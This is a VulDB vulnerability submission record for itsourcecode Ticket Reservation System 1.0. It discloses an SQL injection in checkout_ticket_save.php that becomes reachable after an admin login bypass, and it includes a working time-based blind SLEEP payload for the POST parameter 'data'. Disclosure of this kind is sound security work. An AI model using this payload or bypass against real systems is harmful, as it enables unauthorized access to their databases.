| Title | itsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.php |
|---|
| Description | By exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "checkout_ticket_save.php" page due to the lack of strict filtering of the data parameter.
--------------POC--------------
Parameter: data (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: data=123' AND (SELECT 7295 FROM (SELECT(SLEEP(5)))zbyg) AND 'JWwh'='JWwh |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-2.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/31/2024 07:22 (2 years ago) |
|---|
| Moderation | 08/02/2024 23:43 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273530 [itsourcecode Ticket Reservation System 1.0 checkout_ticket_save.php data sql injection] |
|---|
| Points | 20 |
|---|